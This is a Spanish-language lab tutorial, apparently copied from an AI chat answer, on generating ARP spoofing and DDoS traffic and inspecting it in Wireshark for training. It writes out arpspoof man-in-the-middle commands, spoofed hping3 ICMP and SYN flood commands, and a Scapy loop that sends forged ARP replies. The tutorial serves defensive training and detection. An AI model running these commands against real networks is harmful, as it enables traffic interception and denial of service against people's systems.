Simular paquetes sospechosos como ARP spoofing o DDoS desde un computador para
analizarlos con Wireshark puede ser útil para pruebas de ciberseguridad, laboratorios o
capacitación. A continuación, te explico cómo puedes hacerlo de forma controlada y segura
en un entorno de pruebas.
⚠️IMPORTANTE: Todo esto debe realizarse en un entorno cerrado y controlado, como
una red virtual o laboratorio local. Hacerlo en una red pública o sin autorización es ilegal y
puede tener consecuencias graves.
🔧 Requisitos generales
Una máquina física o virtual con Linux (Kali Linux es ideal, pero Ubuntu también
sirve).
Otra máquina víctima (real o virtual).
Conexión a la misma red.
Wireshark instalado.
Opcional: herramientas como arpspoof, hping3, ettercap, scapy.
✅ 1. Simular ARP Spoofing
🛠 Herramienta: arpspoof (incluida en Kali Linux o instalable con dsniff)
🔌 Pasos:
1. Enciende Wireshark en la máquina víctima.
2. En el atacante (Kali, por ejemplo):
bash
CopiarEditar
sudo arpspoof -i eth0 -t [IP_VÍCTIMA] [IP_GATEWAY]
sudo arpspoof -i eth0 -t [IP_GATEWAY] [IP_VÍCTIMA]
Esto envía paquetes ARP falsos para hacerse pasar por el gateway ante la víctima y
viceversa (man-in-the-middle).
🔍 Qué verás en Wireshark:
Paquetes ARP con direcciones MAC incorrectas.
Tráfico redirigido a través del atacante.
✅ 2. Simular ataque DDoS (flood de paquetes)
🛠 Herramienta: hping3
📌 Ejemplo: ICMP flood (Ping flood)
bash
CopiarEditar
sudo hping3 -1 --flood -a [Link] [Link]
-1 → ICMP
--flood → Enviar paquetes lo más rápido posible
-a → IP spoofing
🔍 Qué verás en Wireshark:
Alta cantidad de paquetes ICMP.
Dirección IP falsa si se usa -a.
Posibles pérdidas o respuestas lentas en la red.
Otros ejemplos:
TCP SYN flood:
bash
CopiarEditar
sudo hping3 -S --flood -p 80 [Link]
✅ 3. Crear paquetes personalizados (más avanzado)
🛠 Herramienta: Scapy (Python)
python
CopiarEditar
from [Link] import *
packet = Ether()/ARP(op=2, pdst="[Link]", psrc="[Link]",
hwsrc="00:11:22:33:44:55")
sendp(packet, loop=1, inter=0.2)
Esto enviará paquetes ARP falsos cada 0.2 segundos.
📈 Consejos para Wireshark
Usa filtros como:
o arp
o icmp
o [Link] == 1
o [Link] == [Link]
Marca los paquetes sospechosos.
Observa tablas ARP para ver cambios.